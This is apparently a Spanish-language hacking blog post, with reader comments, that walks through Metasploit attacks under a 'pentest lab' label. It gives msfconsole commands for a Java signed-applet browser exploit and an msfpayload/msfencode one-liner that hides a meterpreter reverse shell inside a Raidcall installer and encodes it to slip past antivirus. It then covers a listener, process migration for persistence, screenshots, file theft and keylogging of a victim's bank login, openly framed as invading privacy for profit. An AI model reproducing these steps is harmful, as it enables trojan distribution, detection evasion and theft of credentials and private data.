Saludos en esta oportunidad aprenderemos a utilizar mfsconsole / Metasploit, en unos pequeños pasos para que puedan entenderlo poco a poco , como lo vi en un libro este pequeño consejo " primero aprendamos a valorar lo que tenemos para luego usarlo" , Bueno comencemos a aprenderlo localmente, mediante un laboratorio de pentest, para que puedan entender su plataforma .
Laboratorio de Pentest
Requisitos
Software :
Maquina Virtual : VMware Player
Sistemas Operativos :
: Windows XP/7/8
: Backtrack R3
Primordial :
1- Tener Actualizado los nuevos Exploit en msfconsole
2- Saber que archivos son vulnerables a los exploit.
Una ves Instalado todo, vamos a ejecutar Msfconsole en la Terminal del BT.
Como vemos esta es su interface en la terminal, también metasploit tiene una interface grafica como es " Armitage", pero bueno eso lo hablaremos en otro post 8)
Bueno En esta oportunidad daremos Inicio a un tipo de ataque conocido como el " Set Url Attack " /, este tipo ataque esta generado por un exploit en general, el que daremos en ejecución en este momento, carga todos los modulos vulnerables de los distintos navegadores web como #Chrome #Firefox #Opera .. .. . que tengan Las Version Java 7 y anteriores / Sistemas Vulnerables : Windows XP/7/8
Pondremos los Siguientes Codigos en en msfconsole :
use exploit/multi/browser/java_signed_applet /Exploit Utilizado
set lhost 192.168.48.189 /Nuestra IP
set lport 80 / Puerto utilizado
set uripath / /Path para ejecutar la Sesión
Exploit / Ejecución
Una ves Ejecutado Automáticamente empezara a compilar el exploit para en lanzamiento de ataque por la url infectada como vemos en la imagen :
Luego de Ello enviaremos el link a la victima , una ves que la victima aya aceptado el archivo que se genero en el momento que abrio la url, nos dara una conexion :
Como vemos, ya tenemos la la conexion establecida ahora nos conectaremos como vemos es la primera sesion establecida entonces podremos los siguientes comandos, el primero sera abrir la session 1 y sacar la informacion del sistema y crear una shell /CMD para navegar en el sistema :
Tenemos Acceso a todo el sistema mediante este proceso.
Bueno ahora haremos otro proceso mediante la infectacion de archivos ejecutables las cuales nos abriran en este caso una sessions meterpreter automáticamente las cual sera encryptado mediante en encode de msfencode que no es muy utilizado, bueno antes de comenzar les recomiendo leer muy sobre "Encryptadores" y tener algunos para sus pruebas de laboratorio antes de lanzarnos y ser descubiertos .
Lo Primero es tener un archivo ejecutable conocido por ejemplo yo escogeré el " Raidcall" La ultima versión , entonces lo pondré en el Desktop de Backtrack pasaremos abrir nuestra terminal para crear el ejecutable malicioso que se adjuntara con el archivo de "Raidcall"
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.48.189 LPORT=8080 R | msfencode -t exe -x /root/Desktop/raidcall.exe -e x86/shikata_ga_nai -c 10 -o Raidcallv7.exe
Una ves puesto el codigo en la terminal, pasara a encryptar el archivo en su fuente original compilandolo con el del Raidcall :
Una ves creado ya el archivo infectado automaticamente se Guardara en la carpeta /Root
para ver que Antivirus detectan el archivo codificado, entraremos a la web de Virus Total, la cual hace una analisis de nuestro archivo para ver que antivirus los detectan :
Como vemos con esta encryptada de los 47 Antivirus solo nos detectan 24 nada mal, hemos burlado a varios grandes como son " AVG " , " Panda " , " Ikarus " , Malwarebytes"
lo que haremos ahora sera crear la conexion Meterpreter Reverse_tcp en msfconsole,podremos los siguientos comandos :
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.48.189
set lport 8080
exploit
Como vemos ya tenemos nuestro servidor activo para recibir las conexiones entrantes :
ahora pasaremos enviar el archivo a la victima en este caso, utilizare Mi Maquina Virtual de Windows 8 y lo ejecutare como si yo fuera la victima en este caso :
Como vemos no tiene nada sospechoso ya que los instaladores tienen la secuencia de permitir si el usuario desea instalar los programas en modo administrador o normal, una ves ejecutado automaticamente abrira la sesion establecida :
Nosotros podemos controlar y ver que puertos estan asiendo escuchados para esta conexion, en este caso abriremos " netstat " en la maquina Atacante :
Ahora pasaremos abrir " netstat " en la maquina de la victima :
Como vemos podemos detectar los puertos de escucha de ambos, y detectan cualquier intruso en nuestra real, tambien podemos ver el proceso en nuestra barra de herramientas les dare un ejemplo , como vimos cuando abrimos nuestra session meterpreter, pasaremos a poner este comando para ver los procesos abiertos en la maquina de la victima :
[code] ps [/code]
Como vemos estos son los procesos que se estan ejecutando en la maquina de la victima , en este momento pueden mirar :
Ok, como ya sabemos los procesos que se pueden identificar facilmente, que pasaria si la victima, se da cuenta y cierra el archivo Raidcallv7.exe por nos cerraria nuestra conexion meterpreter, entonces lo que haremos sera migrar ese proceso a otro para que la conexion este estable, claro hasta que la victima apage la PC. , si se fijan en la primera imagen de los procesos en Backtrack, nos salen "PID" , con numeros numericos en cada proceso, entonces lo que yo hare sera migrarlo al explorador de windows / explorer.exe pondre el siguiente comando :
[code] migrate 1872 [/code]
Porque puse el numero 1872 ?, porque es la PID numerica de explorer.exe .
Como vemos acabamos de migrar el proceso de la session del archivo Raidcallv7.exe a explorer.exe , entonces la victima cerrara el proceso, y nosotros igualmente tendremos la session establecida .
Como hemos visto en las interpretes de meterpreter, la ejecucion del comando "shell" "sysinfo", ahora vamos aprender los demas interpreter las cuales nos van a servir mucho, para tener pruebas de datos de la victima, fotos, keyloggers,entre muchos .
"Comandos "
[code]screenshot[/code]
Esta interprete ejecuta la funcion de tomar una foto del escritorio de la victima como podemos ver en esta imagen :
Como vemos, este comando nos puede servir mucho para identificar a nuestra victima su privacidad totalmente!, ya sea para fines lucrativos o fines personales.
[code]download[/code]
esta interprete nos permitira descargar archivos de nuestra victima les dare un pequeño ejemplo como vemos en la imagen , yo ya eh ejecutado el comando "Shell" me fui al disco "K" , que es mas que un pendrive o USB entonces eh puesto el comando " Dir" para ver todos los archivos , Los comandos son los mismos al ejecutar la shell en meterpreter si es un sistema windows seran los de ese sistema, y si ejecutas shell , en otros distros, pues sera distintos dependiendo los S.O :
una ves hallado mi objetivo en este caso sera el archivo " Mailers.rar " , ejecutare el comando :[code]exit[/code]
porque ??, porque las opciones de meterpreter no se pueden ejecutar en una opcion ya selecionada como "Shell", entonces una ves cerrado tendremos ya para ejecutar los interpretes.
Entonces yo pondre el siguiente interprete para bajar el archivo :
[code]download K://Mailers.rar /root [/code]
Se preguntaran porque pongo # K://Mailers.rar /root ?
Pongo la direccion completa del archivo, para que sea enviada en la carpeta /root de nuestro sistema, ya que enviara remotamente el archivo descargado
Si deseamos obtener datos de informacion de la victima tambien podemos ejecutar un snifeo remoto con el siguiente comando:
Ejecucion del snifeo
[code]keyscan_start[/code]
en esta oportunidad la victima intentara logearse en una web de un banco .
Para ver los datos capturados :
[code]keyscan_dump[/code]
[code]keyscan_stop[/code]
No Quiero hacer muy grande el post mostrando todos sus comandos, pero para que ustedes puedan saber todos ellos, puede poner en la interprete de meterpreter el comando
[code]help[/code]
Analisis Profundo de codigos hexadecimales y textuales del ejecutable infectado , " RaidcallV7.exe "
En este paso vamos a ver el contenido que tiene el archivo malicioso creado por el payload,este metodo sera compuesto mediante " WinHex "la cual es un programa de analizador de codigos Binarios,hexadecimales,textuales y compone muchos tipos de analisis ya sea de RAW , Archivos , Ejecutables ETC.
Como vemos en la imagen acabo de abrir el archivo " RaidcallV7.exe ", como vemos nos vota su fuente Hexadecimal :
ahora lo que yo deseo ver es el codigo " textual" para ver que tipo de procesos realiza este archivo en la maquina de la victima en el sistema Operativo "Windows" :
bueno esta solo es una muestra de msfconsole , no cabe destacapar que los antivirus detectaran algunos archivos infectados, por ello en otro post que estare asiendo enseñare a como camuflarlos de los Antivirus mas conocidos.
Bueno sin mas que decir, un saludo para todos ustedes.
Que buena informacion man
ResponderEliminarHola, me disculpas si soy grocero, pero realmente donde esta lo avanzado ??? no muestras nada mas alla de lo que las personas puedan aprender por si mismos, puedes adherir un ariculo donde expliques como encontrar un BOF y el desarrollo del exploir para el mismo he implementarlo en el framework.... solo es una critica constructiva Saludos
ResponderEliminarHola bro, pues te tengo que decir algo cuando queria hacer un post profundo " penes en algunas personas que no conocen el tema a "fondo " , pues quise hacerlo asi porque " doy entendimiento de ejecutar los exploi'ts de formas diferentes....
EliminarHabla una segunda parte.., posdata : este blog esta abandonado casi 2 años , solo cambie la fecha de ellos... y escribo ufff" jaja pero bueno, gracias por su critica saludos
Excelente post.
ResponderEliminar